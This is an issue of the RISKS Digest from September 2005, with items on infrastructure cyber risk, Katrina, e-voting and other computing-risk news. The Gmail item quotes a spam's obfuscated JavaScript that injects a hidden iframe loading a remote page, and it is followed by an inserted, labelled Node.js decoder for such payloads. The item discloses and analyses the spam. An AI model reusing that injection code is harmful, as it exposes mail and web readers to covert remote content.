The Risks Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 24 Issue 4

Friday 16 September 2005

Contents

Nation's Critical Infrastructure Vulnerable to Cyber Attack
U.S. House Science Committee
Katrina -- predictions before and response after
Inman Harvey
Health Records Of Evacuees Go Online
Jonathan Krim
One radio frequency for emergency services
Fred Cohen
LA power outage
PGN
Public Call for Skype to Release Specifications
Lauren Weinstein
WebGoat 3.7 - Application Security hands-on learning environment
Jeff Williams
National Academies/CSTB report on Electronic Voting
Herb Lin
Gmail security flaw: acts on javascript in unopened e-mail
Suw Charman
Re: Risks of REAL ID: incorrect
Steven M. Bellovin
CardSystems Complies With Industry Standards
Curt Sampson
REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema
Rob Slade
Info on RISKS (comp.risks)

Nation's Critical Infrastructure Vulnerable to Cyber Attack

<"Peter G. Neumann" <neumann@csl.sri.com>>
Fri, 16 Sep 2005 07:59:39 PDT

Committee on Science, SHERWOOD BOEHLERT, CHAIRMAN
Bart Gordon, Tennessee, Ranking Democrat
http://www.house.gov/science/press/109/109-129.htm
Press Contacts: Joe Pouliot  (202) 225-4275

WASHINGTON, D.C., September 15, 2005 - In testimony before the House Science
Committee today, the Chief Information Officers (CIOs) of major U.S.
corporations warned Congress that the nation's critical infrastructure
remains vulnerable to cyber attack. The witnesses said the economy is
increasingly dependent on the Internet and that a major attack could result
in significant economic disruption and loss of life.

Urging action to address this vulnerability, the witnesses advocated
increased funding for cybersecurity research and development (R&D) and
greater information sharing between industry and government and among
various sectors of industry. Witnesses also urged greater federal attention
to cybersecurity and praised the creation of an Assistant Secretary for
Cybersecurity at the Department of Homeland Security (DHS).

Testifying before the Committee were: Mr. Donald "Andy" Purdy, Acting
Director, National Cyber Security Division, Department of Homeland Security;
Mr. John Leggate, Chief Information Officer, British Petroleum Inc.; Mr.
David Kepler, Corporate Vice President, Shared Services, and Chief
Information Officer, The Dow Chemical Company; Mr. Andrew Geisse, Chief
Information Officer, SBC Services Inc.; and Mr. Gerald Freese, Director,
Enterprise Information Security, American Electric Power.

"We shouldn't have to wait for the cyber equivalent of a Hurricane Katrina
to realize that we are inadequately prepared to prevent, detect and respond
to cyber attacks," said Science Committee Chairman Sherwood Boehlert (R-NY).
"And a cyber attack can affect a far larger area at a single stroke than can
any hurricane. Not only that, given the increasing reliance of critical
infrastructures on the Internet, a cyber attack could result in deaths as
well as in massive disruption to the economy and daily life.

"So our goal this morning is to help develop a cybersecurity agenda for the
federal government, especially for the new Assistant Secretary. I never want
to have to sit on a special committee set up to investigate why we were
unprepared for a cyber attack. We know we are vulnerable, it's time to act."

Leggate testified that an informal survey earlier this year found that
executives in the telecommunications, energy, chemical, and transportation
sectors estimated that about 30 percent of their revenue depends directly on
the Internet. He also said that, because of interdependency among various
industry sectors, a single attack could reverberate throughout the global
economy: "These cascading dependencies all too quickly create 'domino
effects' that are not obvious to the corporate customer or the policymaker."

Kepler told the Committee that the greatest concern for the chemical
industry is the potential for a combined cyber and physical attack. He said
he fears a potential terrorist "using information on shipments, product
inventory, or sites to construct a physical attack ... using false identity to
acquire chemicals for improper use, [or] ... gaining inappropriate access to
systems to cause isolated disruptions."

To help prevent these scenarios from being realized, Kepler urged greater
industry input in the government's critical infrastructure protection
efforts. "Information sharing and continued cooperation between our sector
and the Department of Homeland Security is critical," he testified. "Above
all else, efforts must be focused on those threats of greatest impact and
concern to our national security, while addressing the unique needs of each
sector."

Freese said the security of his sector could also be enhanced through
increased coordination with federal agencies, such as DHS. He also urged
greater R&D funding to guide the development of a next-generation Internet
and a next-generation power grid system that will have built-in security features
to protect against cyber attacks. "The long term solution to present
inadequacies is to build out the old infrastructure with the next generation
of technologies and equipment. The new infrastructure will be based on
greater levels of security and reliability, enhanced design, and recognition
of the interdependencies between the electricity sector and the
communications sector."

The industry witnesses praised the creation of the Assistant Secretary
position and said it will result in greater attention to cybersecurity
issues. Geisse also urged DHS to continue its focus on cyber-related
activities that have proven successful. He said, "We encourage the
Department of Homeland Security to continue to: support research grants and
assistance that focus on national cybersecurity; support industry
organizations and government agencies that create security standards and
best practices; provide early warnings of security events through various
government agencies; and make sure the security best practices that various
critical government agencies develop are shared with our critical
infrastructure industries."

109-129


Katrina -- predictions before and response after

<Inman Harvey <inmanh@cogs.susx.ac.uk>>
Thu, 08 Sep 2005 10:51:44 +0100

They told you so (2002):
- SPECIAL REPORT from THE TIMES-PICAYUNE -
It's only a matter of time before South Louisiana takes a direct hit
from a major hurricane. Billions have been spent to protect us, but we
grow more vulnerable every day.
Five-Part Series published June 23-27, 2002
http://www.nola.com/hurricane/?/washingaway/

They told you so (2004):
What if Hurricane Ivan Had Not Missed New Orleans?  Disasters Waiting to
Happen . . . Sixth in a Series Natural Hazards Observer, 2 November 2004
http://www.colorado.edu/hazards/o/nov04/nov04c.html

A couple of examples from many on
http://en.wikipedia.org/wiki/Predictions_of_hurricane_risk_for_New_Orleans

What use are calculations and predictions of risk, without the institutions
and the political will to react to them? From a viewpoint outside the US,
the response to the Katrina disaster has been quite frankly unbelievable --
sending in troops with guns as a priority over medical and humanitarian
assistance being the most bizarre.

The really big risk is the deep-seated systemic and institutional
malaise for which such responses are symptoms. This is far more than
merely a hurricane.

Inman Harvey, Evolutionary and Adaptive Systems Group, COGS/Informatics,
Univ. of Sussex, Brighton BN1 9QH, UK http://www.cogs.susx.ac.uk/users/inmanh/


Health Records Of Evacuees Go Online (Jonathan Krim)

<"Peter G. Neumann" <neumann@csl.sri.com>>
Wed, 14 Sep 2005 19:46:58 PDT

The federal government is making medical information on Hurricane Katrina
evacuees available online to doctors, the first time private records from
various pharmacies and other health care providers have been compiled into
centralized databases.  The data contain records from 150 Zip codes in areas
hit by Katrina.  Starting yesterday, doctors in eight shelters for evacuees
could go to the Internet to search prescription drug records on more than
800,000 people from the storm-racked region.  Officials hope to soon add
computerized records from Medicaid in Mississippi and Louisiana, Department
of Veterans Affairs health facilities, laboratories and benefits managers.

The records are one step in reconstructing medical files on more than 1
million people disconnected from their regular doctors and drug
stores. Officials fear that many medical records in the region, especially
those that were not computerized, were lost to the storm and its aftermath.

Although the immediate focus is on urgent care for hurricane victims,
participants in the effort say the disaster demonstrates a broader need to
computerize individual health records nationwide and make them available
throughout the medical system. Such a step could, for example, give
emergency room doctors a way to quickly view medical histories for
late-night accident victims.

Electronic health records are controversial among many privacy advocates,
who fear the data could be exploited by hackers, companies or the
government.  [Source: Jonathan Krim, Government Wants Doctors in Shelters to
Have Data, *The Washington Post*, 14 Sep 2005, A24; Thanks to Keith A
Rhodes.  PGN-ed.  The article has considerable discussion on the privacy
implications.]


One radio frequency for emergency services

<Fred Cohen <dr.cohen@mac.com>>
Sun, 11 Sep 2005 18:59:01 -0700

It is sad that politicians start to believe that they know how to solve
technical problems. One such sad case was Rudy Giuliani's pronouncement
today that a single frequency (then frequency band) for all emergency
services would make things work better. Now I am hardly the world's leading
expert on radio frequency spectrum allocation, but I do have some small
amount of experience in understanding radio communications and emergency
response, and I was startled, well not all that startled, perhaps bemused at
the lack of understanding displayed by people who are not risk management
professionals. Of course it seems that a lot of political folks think that
they can do as good a job as risk management professionals, and likely that
is why we are in such a sad state as a nation state at handling emergencies.
I haven't done a complete assessment of the suggestion, but here are some
initial thoughts.

The idea is that communications will work better if everyone can talk to
each other and therefore a single frequency band would allow them to do so
and improve emergency communications. Sounds sensible, however...

1) It means that in order to disrupt ALL emergency communications I only
need to jam one frequency band.

2) Different natural and artificial phenomena interfere with RF
communications in different frequency bands, so by using a relatively
limited portion of the available bandwidth, there is a guarantee that in
some places no communications will work.

3) If I want to listen into your communications, it makes it a lot easier if
I know the frequencies being used, and if everyone has to talk to each
other, then anyone can listen to everyone else.  Encryption won't solve this
of course for the same reason.

4) If there is a big emergency and everyone is on a small subset of the
bands available, there will be a lot of interference, reducing
communications effectiveness.

5) Certain weather and other human induced conditions wipe out portions of
the frequency band for periods of time, making ALL communications fail
simultaneously (see 1 above).

6) Interference between jurisdictions means that dispatchers in one
jurisdiction might end up talking over those of their neighbors, causing
confusion and more traffic problems as well as increasing the potential for
phony messages going on the air.

You all get the idea by now. Of course the last assessment I did that
involved a radio communications system for a local government was several
weeks back, and we were a bit concerned that they only had 3 redundant ways
to communicate via RF - Car radios that talk to towers in redundant
locations - hand-held radios on a different frequency range that could talk
to the towers, the cars, and each other independently of the other tower
system, and cellular telephones that they could use when the other systems
failed. They also reported problems of interference on rare occasions with
the frequencies used by neighboring jurisdictions (see 6 above), but only in
certain locations where they could communicate over quite a long distance
because of weather-related signal bounces off of clouds.

Different frequency bands are used for different things for good reasons,
and there are good reasons that a single frequency band for emergency
response would be a bad thing. Perhaps we should put Rudy in charge of FEMA
and see if things get better or worse... after all, the last political
appointee there with no expertise in emergency management worked out so
well...

Security Posture http://securityposture.com; University of New Haven;
Fred Cohen & Associates 1-925-454-0171 Security Management Partners

  [Further discussion at iwar@yahoogroups.com, including whether one
  frequency or one frequency band was intended.  PGN]


LA power outage

<"Peter G. Neumann" <neumann@csl.sri.com>>
Mon, 12 Sep 2005 16:28:43 PDT

About 700,000 electric customers in Los Angeles lost power Monday afternoon
(12 Sep 2005) after a worker mistakenly cut a wrong line, triggering a
cascade of problems in the city's power grid, a spokesman for the Los
Angeles Department of Water and Power said.  [The latest report as this
issue goes out is that the spec for the operation was incorrect, and that
the crew did exactly as they had been told.  PGN]


Public Call for Skype to Release Specifications

<Lauren Weinstein <lauren@vortex.com>>
Mon, 12 Sep 2005 14:47:24 -0700

As I noted in:

http://lists.elistx.com/archives/interesting-people/200509/msg00122.html

eBay's acquisition of Skype (now official) leads to new concerns over the
proprietary nature of Skype's security and encryption systems, which will
now be under the control of an extremely large and powerful corporate
entity.

For eBay and Skype to have a chance of maintaining the goodwill and trust of
Skype users, I call on Skype to forthwith release the specifications and
implementation details of Skype's encryption and related technologies.

This disclosure should ideally be made to the public, but at a minimum to an
independent panel of respected security, privacy, and encryption experts,
who can rigorously vet the Skype technology and make a public report
regarding its security, reliability, and associated issues.

There are also other significant concerns regarding this acquisition,
relating to eBay's privacy policies and how they may impact the privacy of
Skype users, but I'll hold those for a future message.

Lauren Weinstein lauren@pfir.org 1 818-225-2800
http://www.pfir.org/lauren http://www.eepi.org http://daythink.vortex.com


WebGoat 3.7 - Application Security hands-on learning environment

<"Jeff Williams" <jeff.williams@owasp.org>>
Tue, 6 Sep 2005 09:56:11 -0400

  [From SC-L, included in RISKS with permission of the author.  PGN]

The *only* way to learn application security is to test applications "hands
on" and examine their source code. To encourage the next generation of
application security experts, the Open Web Application Security Project
(OWASP) has developed an extensive lesson-based training environment called
"WebGoat".

WebGoat is a lessons based, deliberately insecure web application designed
to teach web application security. Each of the 25 lessons provides the user
an opportunity to demonstrate their understanding by exploiting a real
vulnerability. WebGoat provides the ability to examine the underlying code
to gain a better understanding of the vulnerability as well as provide
runtime hints to assist in solving each lesson. V3.7 includes lessons
covering most of the OWASP Top Ten vulnerabilities and contains several new
lessons on web services, SQL Injection, and authentication.

WebGoat 3.7 is available for free download from:

    http://www.owasp.org/software/webgoat.html

Simply unzip, run, and go to WebGoat in your browser to start learning.

The OWASP Foundation is dedicated to finding and fighting the causes of
insecure software. Find out more at http://www.owasp.org.


National Academies/CSTB report on Electronic Voting

<"Herb Lin" <HLin@nas.edu>>
September 13, 2005 10:31:17 PM EDT

Announcing a new report from CSTB on Electronic Voting.  Below is the media
advisory on it.  [Reproduced from Dave Farber's IP list.]

Election officials across the United States are increasingly looking to
electronic voting systems as a way to administer elections more efficiently,
but skeptics have raised concerns about the security and reliability of
these systems.  ASKING THE RIGHT QUESTIONS ABOUT ELECTRONIC VOTING, new from
the National Academies' National Research Council, offers a set of questions
that policy-makers and the public should ask to help ensure that the
technologies implemented are secure, reliable, efficient, and easy to use.
Advance copies are now available to reporters. The report, which was chaired
by DICK THORNBURGH, former governor of Pennsylvania, and RICHARD F. CELESTE,
former governor of Ohio, was released on September 13, 2005, and is
available free in PDF form at the web site below.

Press release at http://www4.nationalacademies.org/news.nsf/isbn/0309100240?OpenDocument

Full report at http://www.nap.edu/catalog/11449.html  (sign-in
required for the PDF version).

Herb Lin, Senior Scientist and Study Director, CSTB
National Academies, 1-202-334-3191


Gmail security flaw: acts on javascript in unopened e-mail

<Suw Charman <suw.charman@gmail.com>>
Fri, 16 Sep 2005 09:36:37 +0100

I received a spam this morning that opened audio files without me even
opening the e-mail. The spam was from 'news@capitalex.com' and had the
subject 'news'.

A closer look reveals this code:

<Script Language='Javascript'>

<!--

document.write(unescape('%3C%49%46%52%41%4D%45%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%66%6F%72%65%78%74%72%61%64%65%2E%63%6F%6D%2F%69%6D%61%67%65%73%2F%6E%65%77%65%78%2E%68%74%6D%6C%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%22%31%22%20%0D%0A%0D%0A%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%3E%3C%2F%49%46%52%41%4D%45%3E'));

//-->

</Script>

This decodes to

<IFRAME width="1" height="1"
SRC="http://www.proforextrade.com/images/newex.html" frameBorder="1"
scrolling="no"></IFRAME>

That page loads automatically, *without me having opened the e-mail*, then
runs a shed load of rubbish including two audio files.

Full e-mail with headers available on request.

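The obfuscation in the message above is a standard pattern: a percent-encoded string is passed to unescape() and the result handed to document.write(), so the injected markup is never visible in the raw message. The following Node.js script is an added example, not code from Suw Charman's message or from Gmail: it decodes such a payload statically, without executing anything, and reports which tags and remote URLs it would inject. It uses the script block quoted above as constructed sample input; the hidden-frame heuristic (width or height of at most one pixel) is an assumption of the example.

```javascript
// Added example, not code from the original message: statically decode a
// document.write(unescape('...')) payload of the kind quoted above and list
// what it would inject, without ever evaluating the script. Node.js, no deps.

// Constructed sample input: the script block from the reported spam, verbatim.
const SAMPLE_SCRIPT = `<Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%66%6F%72%65%78%74%72%61%64%65%2E%63%6F%6D%2F%69%6D%61%67%65%73%2F%6E%65%77%65%78%2E%68%74%6D%6C%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%22%31%22%20%0D%0A%0D%0A%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script>`;

// Re-implementation of the legacy unescape(): %XX and %uXXXX become the
// corresponding code unit; everything else passes through unchanged.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_m, u4, x2) => String.fromCharCode(parseInt(u4 !== undefined ? u4 : x2, 16)));
}

// Collect and decode every string literal passed directly to unescape().
function decodeUnescapeCalls(script) {
  const re = /unescape\(\s*(?:'([^']*)'|"([^"]*)")\s*\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(script)) !== null) {
    decoded.push(legacyUnescape(m[1] !== undefined ? m[1] : m[2]));
  }
  return decoded;
}

// Pull one attribute value (double-quoted, single-quoted or bare) out of the
// attribute text of a tag; returns null when the attribute is absent.
function attrValue(attrs, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s"\'>]+))', 'i');
  const m = re.exec(attrs);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
}

// Assumption of this example: a frame or image sized to 1x1 or smaller is
// invisible to the reader and therefore suspicious.
function isHidden(attrs) {
  const w = parseInt(attrValue(attrs, 'width'), 10);
  const h = parseInt(attrValue(attrs, 'height'), 10);
  return (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
}

// For one decoded fragment, list the opening tags it contains together with
// the remote resource each references (src or href) and whether it is hidden.
function extractInjectedTargets(html) {
  const tagRe = /<\s*([A-Za-z][\w-]*)([^>]*)>/g;
  const targets = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[2];
    targets.push({
      tag: m[1].toLowerCase(),
      url: attrValue(attrs, 'src') || attrValue(attrs, 'href'),
      hidden: isHidden(attrs),
    });
  }
  return targets;
}

// Full analysis of a script block: the decoded fragments plus every target
// they would inject into the page.
function analyzeScript(script) {
  const decoded = decodeUnescapeCalls(script);
  const targets = decoded.flatMap(extractInjectedTargets);
  return { decoded, targets };
}

// Stand-alone run: print the findings for the sample.
if (typeof module !== 'undefined' && require.main === module) {
  const result = analyzeScript(SAMPLE_SCRIPT);
  for (const t of result.targets) {
    console.log(`${t.hidden ? 'HIDDEN ' : ''}<${t.tag}> -> ${t.url}`);
  }
}
```

Run with `node decode.js` to print the injected targets; for the sample this is a single hidden iframe pointing at the URL shown in the decoded markup above. Because the decoding is done by regular expressions rather than by evaluating the script, the same approach can be run over quarantined mail safely; it will, of course, miss payloads that are assembled by string arithmetic rather than by a single unescape() literal.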

Re: Risks of REAL ID: incorrect (Re: RISKS-24.02)

<"Steven M. Bellovin" <smb@cs.columbia.edu>>
Mon, 29 Aug 2005 12:03:15 -0400

Charles Lamb's comment on the REAL ID law, though technically correct, is
disingenuous.  A National Research Council report ("Who Goes There --
Authentication Through the Lens of Privacy") noted this:

  Finding 6.5: State-issued driver's licenses are a de facto nationwide
  identity system. They are widely accepted for transactions that require a
  form of government-issued photo ID.

Steven M. Bellovin, http://www.cs.columbia.edu/~smb


CardSystems Complies With Industry Standards

<Curt Sampson <cjs@cynic.net>>
Fri, 2 Sep 2005 13:43:11 +0900 (JST)

At either of these two URLs:

  http://xrl.us/hd9g
  http://yahoo.reuters.com/financeQuoteCompanyNewsArticle.jhtml?duid=mtfh39850_2005-09-01_15-31-19_n01450451_newsml

you can read that

  Payments processor CardSystems Solutions Inc., where a security breach
  exposed more than 40 million credit card accounts to fraud, on Thursday
  said its auditor had completed a report to payment networks and concluded
  it complies with industry data-security standards.

The sad thing is, it's probably true.

Curt Sampson  <cjs@cynic.net>   +81 90 7737 2974   http://www.NetBSD.org


REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema

<Rob Slade <rslade@sprint.ca>>
Wed, 14 Sep 2005 08:16:39 -0800

BKFORDIS.RVW   20050310

"Forensic Discovery", Dan Farmer/Wietse Venema, 2005, 0-201-63497-X,
U$39.99/C$57.99
%A   Dan Farmer zen@fish2.com
%A   Wietse Venema wietse@porcupine.org
%C   P.O. Box 520, 26 Prince Andrew Place, Don Mills, Ontario M3C 2T8
%D   2005
%G   0-201-63497-X
%I   Addison-Wesley Publishing Co.
%O   U$39.99/C$57.99 800-822-6339 Fax: (617) 944-7273 bkexpress@aw.com
%O  http://www.amazon.com/exec/obidos/ASIN/020163497X/robsladesinterne
  http://www.amazon.co.uk/exec/obidos/ASIN/020163497X/robsladesinte-21
%O   http://www.amazon.ca/exec/obidos/ASIN/020163497X/robsladesin03-20
%O   Audience a+ Tech 3 Writing 1 (see revfaq.htm for explanation)
%P   217 p.
%T   "Forensic Discovery"

In the preface, the authors don't promise to teach the reader anything about
computer or digital forensics.  Rather, they are reporting on ten years'
worth of experience in looking into attacked machines.  Given the authors'
background, this is engrossing.  But turning it into useful guidance might
be left as an exercise for the reader.  This is not a tutorial work for the
novice, but a challenge to the experienced professional.

Part one outlines the basic concepts of forensics in digital systems.
Chapter one presents the "spirit of forensic discovery": look anywhere, for
anything, and be prepared when you find it.  (This is a tall order,
particularly the "being prepared" part, but it basically corresponds to my
experience.)  Time information and stamps (on UNIX systems) are discussed in
chapter two, along with mention of the ways that clumsy attempts to "save"
systems can destroy ephemeral information.  However, the level of the
material sweeps between broadly generic and tightly specific: it may be
difficult for those not already thoroughly familiar with forensic activities
to obtain useful guidance from it.

Part two is supposed to provide us with background on the abstractions of
the computer and operating systems that relate to forensic recovery of
materials.  Chapter three addresses file system basics, but does so
specifically with regard to the UNIX system.  The content is much more
detailed than conceptual (covering, for example, allowable characters in
UNIX filenames), and command examples are not always completely explained.
The usefulness of this approach is questionable, since the reader is assumed
to know the UNIX system well; in which case, why cover the elementary
fundamentals?  However, the work does highlight aspects of operating and
file system internals not encountered in normal administrative activity.
Analysis of information recovered from a compromised system is reviewed in
chapter four.  The methods and procedures are very strictly limited by the
case cited, but the examples demonstrate the backhanded thinking needed to
obtain interesting data after an intrusion.  A variety of intriguing ways to
subvert a running system are examined in chapter five.  As with previous
material, the text seems to talk around the topic, while the examples,
although fascinating, don't always support the general concepts under
discussion.  Analysis of the code of malicious software (a practice known in
virus research as forensic programming) is addressed in chapter six,
although the bulk of the content deals with test execution of the
programming (under various forms of restriction) and both the benefit and
complexity of disassembly is passed over rather lightly.

Part three moves beyond the concepts and into practical difficulties.
Chapter seven, although titularly about the contents of deleted files, is
primarily concerned with the conservation and preservation of the access,
modification, and (attribute) change times of files.  (In response to the
draft of this review, the authors clarified some of the points that they
were trying to make in the text, such as the fact that material from deleted
files is often more persistent than the content of active files.
Unfortunately, these points, while arresting, are not always clear in the
work itself.)  Retrieving data from memory, particularly via the swap or
paging areas of disk, is reviewed in chapter eight.

The preface does state that the authors intend this book to be useful to
sysadmins, incident responders, computer security professionals, and
forensic analysts.  I would suggest that only the last group will find much
here that they can use, and then only those at the advanced edges of the
field.  There is certainly much that is intriguing, but the material demands
of the reader that he or she have extensive background and knowledge of
system and filesystem internals.  Even then, extracting the information from
the target system, and drawing conclusions as to the implications of that
data, will be difficult.  Farmer and Venema have outlined some fascinating
material, on the bleeding edge of the technology, but have not made it easy
for practitioners to utilize or comprehend.

(In response to the draft review, the authors have noted that the full,
original text of the book is now available at http://fish2.com/forensics/ or
http://www.porcupine.org/forensics/.)

copyright Robert M. Slade, 2005   BKFORDIS.RVW   20050310
rslade@vcn.bc.ca      slade@victoria.tc.ca      rslade@sun.soci.niu.edu
http://victoria.tc.ca/techrev    or    http://sun.soci.niu.edu/~rslade

  [I found this book to be very useful, timely, and interesting.  PGN]
